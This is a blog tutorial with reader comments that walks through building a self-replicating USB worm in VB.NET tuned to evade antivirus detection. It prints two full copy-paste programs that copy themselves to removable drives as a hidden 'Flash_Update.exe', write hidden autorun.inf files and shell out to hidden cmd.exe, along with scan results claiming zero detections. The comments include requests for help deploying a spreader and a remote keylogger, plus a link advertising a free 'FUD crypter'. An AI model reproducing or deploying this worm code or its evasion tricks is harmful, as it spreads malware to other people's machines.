Antivirus Evasion: The Making of a Full, Undetectable USB Dropper / Spreader
Some Basics and Overview
Usually when we talk about bypassing antivirus software, and especially when we talk about antivirus programs like NOD32, Kaspersky, BitDefender… We automatically think about deep coding knowledge, using undocumented APIs or using Zero days exploits, but this is not always true, since by applying some “very” basics approaches we will be able to bypass most of (if not all) antivirus programs, at least for doing some basic things.
Basically, all antivirus programs detect malicious files the same way, either by checking for a digital signature inside of the files (which explains the importance of keeping your antivirus up to date) or by a technique called heuristic detection. This (and of course other criteria) usually makes the difference between a good and a bad antivirus.
Signature detection
Technically when an antivirus starts looking for a signature, it looks for “string(s)” found by Antivirus research labs and considered as a fingerprint that a malicious program code may have. Every single virus, worm, or any other malware has its own signature, and considering the fact that there are billions of malicious files in the world, and there are more and more malware developers, looking for a specific signature becomes almost impossible, so Antivirus labs and malware analysts start to give a kind of generic signature to help find a type of malicious program, and not the “one by one” way.
Even using generic signatures, this detection mode is still archaic due to the diversity of ways to protect malware from being detected. Complex packers, custom encryption or polymorphism make this way of detection not 100% reliable, especially when it comes to detecting totally new viruses or very complex ones.
Heuristic detection
Almost all recent antivirus software have a heuristic detection mode which consists (in a very simple way) to simulate a file execution, then monitoring if this file performs any suspicious activities like replication, file injection, file downloading or hiding files from the explorer. This is quite clever, but may lead to generate lot of false positive detections since heuristic analysis is a kind of multi-criteria analysis based in most cases on “already known” codes, classes, methods, functions or some commands that are not usually implemented in widely used programs. This may be considered as a kind of weakness that would, and will be, exploited (later in this article) to avoid detection by this way of analysis, since at this stage, bypassing heuristic analysis is bypassing the whole antivirus because every “fully” new coded malware is totally unknown by the antivirus and will not be detectable instantly via a digital signature.
The problem is not coding a harmful program; the real problem is spreading it out! As known, the aim of any malicious program coder is to infect or take the control of the largest number possible of computers, and this cannot be done manually, so almost every virus, worm, botnet, etc. has one or more ways to propagate implemented as functionality! And one of the most common modes used is self-spreading via removable disks like USB flash drives.
The idea is quite simple: the malware will check periodically for removable disks (USB keys, memory cards, and even some external hard drives). If found, it will copy itself (replication of the original malware) on it / them under an appealing name or under a random one, but hides itself from the explorer by changing the file attributes, and will create an Autorun.inf file which will run the replication mode every time this removable disk is plugged into a computer.
Our Main Goal
For every new generation of Antivirus software, this behavior will be flagged as suspicious or malicious behavior and will be detected in most of cases as Trojan horse Dropper.Generic, Trojan.Generic or something similar!
We will see how we can make a fully undetectable USB spreader, without any obfuscation or encryption, just by making the same thing the way Kaspersky’s heuristic analysis does not consider as “malicious behavior”.
I’ll use VirusTotal to analyze generated files (even if it’s not important since our program is not really harmful) and all upcoming tests are made under Windows 7 Ultimate with the trial version of Kaspersky Internet Security 11.0.2.556 installed.
All codes are in VB.NET using Frameworks 4, which is an uncommon language for coding malicious stuff, but it’s wise to say that some serious worms, viruses and remote administration tools were done using VB, VB.net or VBscript.
Anyway, let’s make a USB dropper “the normal way” and see how it’s seen by VirusTotal and Kaspersky’s heuristic analysis.
The Game
Let’s start by making a basic USB spreader. If you want to make tests, just create a new project under Microsoft Visual Studio, and make sure you import System.Threading and System.IO then copy and paste this code:
Imports System.Threading
Imports System.IO
Public
Class
Form1
Shared ReplicatedName As
String = “USBsetup.exe”
Private
Sub Form1_Load(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles
MyBase.Load
StartUSBspreading()
End
Sub
Sub StartUSBspreading()
Try
Do
Dim Alldrives() As
DriveInfo = DriveInfo.GetDrives()
For
Each DriveFound As
DriveInfo
In Alldrives
If DriveFound.DriveType = “2”
And DriveFound.IsReady = True
Then
System.IO.File.Copy(Application.ExecutablePath, DriveFound.RootDirectory.ToString & ReplicatedName, True)
File.SetAttributes(DriveFound.RootDirectory.ToString & ReplicatedName, FileAttributes.Hidden)
AutorunMaker(DriveFound)
End
If
Next DriveFound
Thread.Sleep(6000)
Loop
Catch ex As
Exception
End
Try
End
Sub
Public
Shared
Sub AutorunMaker(ByVal driveFound As
DriveInfo)
Try
File.Delete(Convert.ToString(driveFound.RootDirectory) & “autorun.inf”)
Dim AutorunStreamWriter As
New
StreamWriter(Convert.ToString(driveFound.RootDirectory) & “autorun.inf”)
AutorunStreamWriter.WriteLine(“[autorun]”)
AutorunStreamWriter.WriteLine(“shellexecute=” & ReplicatedName)
AutorunStreamWriter.Flush()
AutorunStreamWriter.Close()
File.SetAttributes(Convert.ToString(driveFound.RootDirectory) & “autorun.inf”, FileAttributes.Hidden)
Catch ex As
Exception
End
Try
End
Sub
End
Class
Instead of using direct APIs like WM_DEVICECHANGE that get you notified about hardware device changes, and to avoid the use of controls like timers, usually malicious programs coders use infinite loops looking for removable disks, and that sleep for seconds, just like what happens in this case. On program load, StartUSBspreading() is called and it gets all detected drives, then it looks only for removable ones. If the drive found is ready, the program makes a replication of itself and an aurotun.inf file that will load the replicated file, and hides both of the newly made files.
VirusTotal did not return real useful information since it makes just a static analysis:
File name: MyTestApp.exe
Detection ratio: 1 / 42
Antivirus | Result | Update |
Jiangmin | Trojan/Generic.niew | 20120904 |
Kaspersky | – | 20120904 |
With a detection ratio of 1/42 we may say that we have already an interesting achievement, but when running a heuristic analysis of Kaspersky it detects our program, which has no digital signature, as high risk program and neutralizes the threat.
Figure 1 Behavior similar to PDM.Trojan.generic detected
At this stage we can consider several changes on our code that may lead to decreased detection rate, like using classes and modules, but one of the most powerful – and easiest – techniques is renaming as many functions, subs and events used as possible. We said that heuristic analysis is based on already known stuff, and almost all malicious programs do the same things like damaging your computer, stealing personal data or spying on your activities … and most of these aims are reached using some common piece of codes, for example to make a keylogger, you will probably use APIs like SetWindowsHookEx and events like Hook_Keyboard(), and by changing subs and functions names to some common ones (like BooksManagers(), Baby, Chat_System(), etc.) malicious coders reach an unexpected detection ratio! Renaming already known functions and subs can actually decrease detection ratio very considerably.
Our sample is just a few lines of code, and renaming subs will not bypass Kaspersky. Let’s think about this a second, our objective is clear: making a replication of our program and an Autorun.inf file in any plugged removable disk.
Instead of using suspicious methods like File.Copy() and File.Delete(), we can possibly make Kaspersky and most antivirus programs believe that it’s the user who copied or deleted files by using another intermediary program that requires almost no privilege, which is Windows CMD command line (executable cmd.exe).
By invoking the Windows command silently, we can do everything that could be done via the command line without any restrictions!
We can make a thread that creates the autorun.inf file temporarily somewhere in the user’s system folder and another thread that checks for the presence of plugged removable disks and makes copy tasks via hidden instances of command line.
This may seems strange, but after some tests I made, using weird names for functions, procedures, and methods may also help decrease the detection ratio.
Here is the new code for our USB dropper:
Imports System.Threading
Imports System.IO
Public
Class
Form1
Dim MyPogramPath As
String = Application.ExecutablePath
Dim MyAutPath As
String = Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) & “microsoftautorun.inf”
Dim mo As
New
Thread(AddressOf makdeotrn)
Dim k1 As
New
Thread(AddressOf kaynaChiKle)
Sub OnchorhaWalakal2ajr(ByVal d As
String)
Try
If
Not IO.File.Exists(d & “Flash_Update.exe”) Then
Dim Proc As
New
Process()
Proc.StartInfo.FileName = “cmd.exe”
Proc.StartInfo.Arguments = “/c copy “ & “””” & MyPogramPath & “””” & ” “ & “””” & d & “Flash_Update.exe”
Proc.StartInfo.WindowStyle = ProcessWindowStyle.Hidden
Proc.StartInfo.CreateNoWindow = False
Proc.Start()
Proc.WaitForExit()
Proc.Close()
FileSystem.SetAttr(d & “Flash_Update.exe”, FileAttribute.Hidden)
End
If
Catch ex As
Exception
End
Try
End
Sub
Sub OnchorhaWalakal2ajr2(ByVal d As
String)
Try
Dim Proc As
New
Process()
Proc.StartInfo.FileName = “cmd.exe”
Proc.StartInfo.Arguments = “/c copy “ & “””” & MyAutPath & “””” & ” “ & d
Proc.StartInfo.WindowStyle = ProcessWindowStyle.Hidden
Proc.StartInfo.CreateNoWindow = False
Proc.Start()
Proc.WaitForExit()
Proc.Close()
FileSystem.SetAttr(d & “autorun.inf”, FileAttribute.Hidden)
Catch ex As
Exception
End
Try
End
Sub
Sub kaynaChiKle()
a:
Dim kle() As
DriveInfo = DriveInfo.GetDrives()
For
Each found As
DriveInfo
In kle
If found.DriveType = “2”
And found.IsReady = True
Then
Try
OnchorhaWalakal2ajr2(found.RootDirectory.ToString)
OnchorhaWalakal2ajr(found.RootDirectory.ToString)
Catch ex As
Exception
End
Try
End
If
Next found
GoTo a
End
Sub
Public
Sub MakDeOtrn()
Try
Dim appdata As
String = Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) & “microsoft”
Dim sw As
New
StreamWriter(appdata & “autorun.inf”)
Dim s As
String = appdata & “autorun.inf”
If IO.File.Exists(s) Then
Try
IO.File.Delete(s)
Catch ex1 As
Exception
End
Try
End
If
sw.WriteLine(“[autorun]”)
sw.WriteLine(“shellexecute=” + “Flash_Update.exe”)
sw.Flush()
sw.Close()
Catch ex As
Exception
End
Try
End
Sub
Private
Sub Form1_Load(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles
MyBase.Load
mo.IsBackground = True
mo.Start()
k1.IsBackground = True
k1.Start()
End
Sub
End
Class
Some explanation for the code above:
- MakDeOtrn() will make autorun.inf into “C:UsersUserNameAppDataRoamingmicrosoft” designed to run a file called “Flash_Update.exe“
- OnchorhaWalakal2ajr (b) checks if the removable disk is not infected yet, if it’s true, we set the application that we want to start which is cmd.exe, we set the arguments that are in the command line which will copy the running program (our malicious program) to the removable disk found, under the name “Flash_Update.exe” and of course starts cmd.exe in a hidden window, and wait until the end of copying process to hide the replicated file from the explorer.
- OnchorhaWalakal2ajr2 (b) does the same thing as #2 for “autorun.inf“
- kaynaChiKle() will check infinitely for the presence of removable disks, if found it calls respectively procedures #3 and #2.
Before testing this new generated program, VirusTotal now considers it as a clean file with a detection ratio of 0/41 as you can see from this link. (www.virustotal.com/file/62254a2968b9a9385a9510431b8023fa2db50b572b6c5d76fdfea0234df8ea03/analysis/1346780514/)
Scanning our program with Kaspersky reveals absolutely nothing:
Figure 2 No threat has been detected
After starting it, our program spreads itself as seen here:
To Conclude…
We can make fully undetectable Download and Execute programs, even some silent Download and Install programs and some real silent adwares, and this with absolutely no deep coding knowledge, and the worst is that this simple technique seems to bypass all known antivirus (tested with 5 well known antivirus and further tests are to come), and we can make our spreader even more difficult to detect by encrypting or obfuscating it.
Complicated things like bypassing antivirus, especially those like Kaspersky, NOD32, BitDefender or AntiVir may not need to be done the complicated way, the example of this USB spreader may let us conclude that as smart as an antivirus and its analysis are, there is always a “simple” way to cheat it.
References
great approach! it reminds me a lot of meta approaches, like the one that allow to build up contradictions at the basis of Godel’s theorem. I wonder if something similar could be shown to hold in security: given a program (antivirus) with finite memory that runs in finite time (even if increasing with the analysed data), is it possible to write a meta-virus that gets undetected?
As in Godel theorem, that would mean that even a meta-antivirus could not detect a meta-meta-virus and so on… that would be a nice result (at least theoretically, don’t know how much antivirus companies would like it…)
Where is the innovation here ? This method is already used !!!
I have created my own .exe years again and still use it without any AV detection. By the way, i did not use VBs but a scripting language called AHK. And i really could inject this tiny code and do whatever i want.
So, this is an old technique almost known by a lot of advanced pentesters.
Stay cool ! no body talked about innovation mate ! And leave it somewhere in your mind that ALL and EVERY methods are already used… publicly or privately so just try to be more constructive and share with us what you did using “AHK” !!
From that result it seems that Kaspersky emulator only emulates the windows api, but it either doesn’t allow new processes or it makes the cmd.exe fail before it reaches the file write operation.
I wonder how deeply other av products can emulate the os? Now you ony tested with Kaspersky, as like you said, virustotal only does a static scan.
This method would definitely allow av bypass until your sample gets to the AV companies backend servers, after which it’ll gets its own autogenerated detection.
Actually I’m not sure about what did Kaspersky’s emulator exactly and running CMD in user mode will really trigger no AVP… I guess monitoring parameters passed to cmd remains a possible way to avoid this technique.. but as you said “This method would definitely allow av bypass until your sample gets to the AV companies backend servers” !
Sounds very interesting but indeed stills very theoretical making meta-meta-virus will lead definitely to make meta-meta-meta-antivirus , and I wonder if we can make computers that can hold “meta virus” and “meta antivirus”
Very nice job including everything from start to finish.
Hey,thats a great work.I had build some custom replicating programs myself few years back in vb.net,but since antivirus started identifying the signature i stopped working on it.But now you have given me a clear idea on how to workaround.Thanks for sharing this info.
Thank you, the aim is showing some AVPs weakness and try to improve the way they detect malicious programs. it must be different other ways to makes undetectable files replications, the danger of this way is that “anyone” can easily make silent installer or silent “download and executors” just by handling cmd’s parameters …
Hi, great work but it won’t work againts Enterprise AV that block Autorun or Execution on USB. By default they don’t but I always setup Trend Micro OfficeScan this way and it save me and my customers a lot of infections. They can still work since they have read and write permission on USB. VirusTotal does not test this function or do not test Reputation that block C&C communications. Blocking execution and Autorun on removeble devices is a must have in an antimalware solution.
Hello,
This seems legit ! but will be a solution to prevent execution not replication, the first aim is not infecting removable disks or make some trick to bypass replication detection, The problem is that we can do things “not supposed to be done” easily and may have really no way to be detected by AVPs that let us think about how fare we can trust our antivirus, we can take the example of silent installation by passing parameters like /S /v “/qn /quiet /passive /norestart …. to the command line… We really have to think twice about this !
Hello Soufiane, this is really brilliant ! Thanks for the share , I was wondering can you help me set an undetectable usb spreader please? Just wanna know how to set it up and thats it, thanks , do reply please 😀
Normally you can just adopt this approche to do it by yourself !! but I may help you with pleasure !
Very interesting, happy to cross this website, keep posting !
One of the most easy and simple way to bypass modern antivirus softwares. Good work Tahiri …
Than you ! Indeed this must be the most easiest way to bypass almost all present AV programs at least for doing some few things !
Hi Soufiane, can you tell me other resource to avoid av detection?
I’m interested on downloading from a secure website to save file to disk, read/write/execute exe file from usb key etc…
Thank you! Good work!!
Technically this is quite possible but this may require a bit more “technical” skills, I may write something regarding this and let you know it !
Could this been possible b’coz your program wasn’t destructive and heurastic AV scanner does not found anything special in your programm while emulation? Even possibility of Av to just block device auto-run until all autorun script entries scanned/emulated to find out little something that coder have done to take control/exploit and flag it suspicious. but the artical is quit cool 😉
This might be used to replace all USB spreading techniques sur the whole application is not harmful and we cannot make interesting things only via dos command line, except the fact that we can use it to execute downloaded files, make silent installs AND, and this is the real risque, there is no way until now at least to stop the use of the command and scan parameters!
This said, I worked on a full undetectable RAT with mixed features between traditional RATs and BotNets that uses command line to do zip/rar spreading, usb spreading, download and install, download and execute without any AV flags.
Clever and really hard to be flagged ! was happy reading ! Thank you
Welcome if you need any more clarification or have any suggestion please feel free !
‘@TutorialesFercheins 1) that scan should have snnaced those directories 2)who said I am using CCleaner to clean the temporary files, PS The system is just a Windows XP Install with MBAM and hitman pro installed. 3) Are you kidding me? I showed the settings!
Do you keep CCleaner running 24/24 7/7 ?
Very innovative way to bypass modern AV programs… Thank you Tahiri for sharing this !!
Thank you, this is just a simple approach to demonstrate how easy doing some interesting things like bypassing AVPs, I’ll try to develop this in an other article !
Thank you again
This is just an amazing article !! Thank you for sharing this and please keep on the great work !
Its always a pleasure sharing knowledge ! feel free if you have any question !
Nice approach! this
may cause troubles to av vendors. thank you for sharing it
Yeah you’re right that’s why I contacted some of them and I get some feed-backs regarding this.
Thank you
Hey Soufiane, I really liked your blog itsecurity.ma, this approach is very effective in bypassing modern AV, thanks for sharing.
Thank you you are welcome !
How is possible using AHK?
I’m CURIOUS to know how?!
hahah you made my day mate !! I’m mush more curious !
j’ai assisté à la réalisation de ce travail, congratulation cher frére tu es le meilleur
Merci Khay Mounir ça fait vraiment plaisir
This is Very amazing article i liked it Keep it up u r work it very helpfull 🙂
Thank you I’ll do, and if you have any suggestion please feel free!
haha, nice work 🙂
Thank you !
Wow nice work, I hope that antivirus companies will learn from it.
Contacted Kaspersky, No response , no solution !
I’m not a technical person. Can you suggest a key logger that I can deploy remotely that will bypass an anti virus?
sorry, but things like that cannot be suggested jute like that…
One of the most intetesting work I ve ever seen.
Thank you.
really worth to read.
Simple and easy. It working for Avira and avast. Great Good work Soufiane !!
Here is also a good FUD Crypter…Complettely NEW!!!
You can get if for free here: http://hackers-support.blogspot.co.at/
The FUD is being detected by avast .